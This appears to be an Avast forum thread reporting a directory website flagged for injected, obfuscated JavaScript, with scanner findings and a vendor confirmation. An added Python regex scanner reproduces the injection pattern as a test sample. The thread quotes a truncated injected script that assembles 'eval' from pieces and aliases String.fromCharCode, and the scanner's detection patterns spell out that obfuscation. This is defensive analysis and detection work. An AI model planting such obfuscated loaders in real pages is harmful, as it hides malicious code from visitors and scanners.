Topic: Site fails injection check - potentially suspicious initialization method!


Offline polonus
Injection Check: Suspicious Text after HTML
Quote:
<script>var date=new Date(),pau=('ev'+date.getFullYear()).replace('2010','al');g=window[pau];sf=window['String'].fromCharCode;g(sf(4.5*2,59*2,48.5*
Flagged here as suspicious: http://app.webinspector.com/public/reports/show_website?site=http%3A%2F%2Fpr5dir.com
WhatWeb info: htxp://pr5dir.com [200] PHP-Link-Directory[3.2.0],
 Meta-Author[PageRank 5 Directory / Cast-Iron Solutions LLC],
 MetaGenerator[PHP Link Directory 3.2.0],
 HTTPServer[LiteSpeed],
 PoweredBy[:],
 IP[173.193.201.151],
 PHP[5.3.28],
 X-Powered-By[PHP/5.3.28],
 Cookies[PHPSESSID],
 Title[PageRank 5 Directory],
 Country[UNITED STATES][US]
Blocked external link: htxp://www.ppcadcenter.com/Openads/adx.js
This URL is or was distributing a malware variant of JS/Kryptik.AGR trojan - status Up(nil): unknown_html on IP
IDS for other domain on IP: http://urlquery.net/report.php?id=5912093

Possible malware found: http://sucuri.net/malware/malware-entry-mwanomalysp8 -> http://app.webinspector.com/public/reports/19853967
Potentially suspicious files flagged by Quttera: http://www.quttera.com/detailed_report/pr5dir.com
view code: http://jsunpack.jeek.org/?report=b1461d8a81ed69acc97c204615e75fb8202ad7e4  ->
Detected potentially suspicious initialization of function pointer to JavaScript method String.fromCharCode

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
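The two findings above (a script block sitting after the closing HTML tag, and a variable bound to String.fromCharCode next to a computed window[...] lookup that assembles the word "eval") are the kind of pattern a static injection check looks for. The scanner below is an added example for readers of this thread, not code from polonus or from any of the scanners linked above; the HTML samples inside it are constructed to mirror the quoted pattern, and the heuristic names and thresholds are my own assumptions.

```python
import re

# Constructed sample: a plain page with a script appended after </html>,
# mirroring the "Suspicious Text after HTML" finding quoted in the thread.
SAMPLE_PAGE = """<html><head><title>Directory</title></head>
<body><p>Links</p>
<script src="/js/site.js"></script>
</body></html>
<script>var date=new Date(),pau=('ev'+date.getFullYear()).replace('2010','al');g=window[pau];sf=window['String'].fromCharCode;g(sf(104,105));</script>
"""

# Constructed sample: a legitimate direct call to String.fromCharCode inside the document.
CLEAN_PAGE = """<html><head><title>Directory</title></head>
<body><p>Links</p><script>document.title = String.fromCharCode(72, 105);</script></body></html>
"""

# Each heuristic is an assumption about what an injection check keys on; names are mine.
FINDINGS = {
    # a <script> that starts only after </html> is the classic sign of appended injection
    "script_after_html": re.compile(r"</html>.*?<script\b", re.IGNORECASE | re.DOTALL),
    # a variable bound to String.fromCharCode (directly or via window['String']) instead of a call:
    # the "initialization of function pointer to String.fromCharCode" jsunpack reports
    "fromcharcode_alias": re.compile(
        r"\b\w+\s*=\s*(?:window\s*\[\s*['\"]String['\"]\s*\]|String)\s*\.\s*fromCharCode\s*(?![\s(])",
        re.IGNORECASE),
    # window[<identifier>] with a non-literal index: a global (eval, unescape, ...) looked up by computed name
    "computed_window_lookup": re.compile(r"window\s*\[\s*(?!['\"])[A-Za-z_$][\w$]*\s*\]"),
    # 'ev' + <something> followed by .replace(..., 'al'): assembling the string "eval" piecewise
    "eval_string_assembly": re.compile(
        r"['\"]ev['\"]\s*\+.*?\.replace\s*\([^)]*['\"]al['\"]\s*\)", re.DOTALL),
}


def scan_html(page: str) -> dict:
    """Return {finding name: matched snippet} for every heuristic that fires on the page."""
    hits = {}
    for name, pattern in FINDINGS.items():
        match = pattern.search(page)
        if match:
            snippet = match.group(0)
            hits[name] = snippet if len(snippet) <= 80 else snippet[:77] + "..."
    return hits


def verdict(page: str) -> str:
    """Classify a page: one lone hit only merits review, two or more together is the thread's pattern."""
    hits = scan_html(page)
    if not hits:
        return "clean"
    return "suspicious" if len(hits) >= 2 else "review"


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("clean", CLEAN_PAGE)):
        print(label, verdict(page), scan_html(page))
```

The point of requiring two heuristics before calling a page suspicious is the same one the thread illustrates: a direct String.fromCharCode call is ordinary, and a script after the closing tag can be a sloppy template, but an alias to fromCharCode sitting beside a computed lookup that spells out "eval" after the document has ended is the combination worth escalating to a full report on a service like jsunpack or urlquery.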

Offline polonus
Update: This is a suspicious page
Result for  2015-08-19 20:18:58 UTC
Website: -http://pr5dir.com
Checked URL: -http://pr5dir.com/
Suspicious iframes detected:
Object:-http://pr5dir.com/
SHA1: 94c4068b0ce8349eedcb1c52fdbee70d1d32b5bf
Name: TrojWare.JS.TrojanDownloader.Iframe.CQQ
See: https://www.virustotal.com/nl/url/088657b5c917550fd38140ea92e6a645755d9e6a583a65f98d7cf498d133041d/analysis/
Avast detects as JS:Decode-BW trojan in the java cache: http://1col.ru/www.pr5dir.com
Both the analyses of Sucuri and Quttera are blocked because too much of the code is given there.

polonus

P.S. Strange this destination is not blocked: -http://www.ppcadcenter.com/  conversant tracking....
But DrWeb blocks: -http://www.ppcadcenter.com/Openads/adx.js
Page blocked by Dr.Web Link Checker

Damian

« Last Edit: August 19, 2015, 11:52:10 PM by polonus »


Offline Pondus
F-Secure reply

=================================================================================================================
The submitted website (pr5dir.com.htm)  has been verified to be malicious and the appropriate rating is now updated. The update will take effect on the next product update cycle.
=================================================================================================================

« Last Edit: August 20, 2015, 12:27:24 AM by Pondus »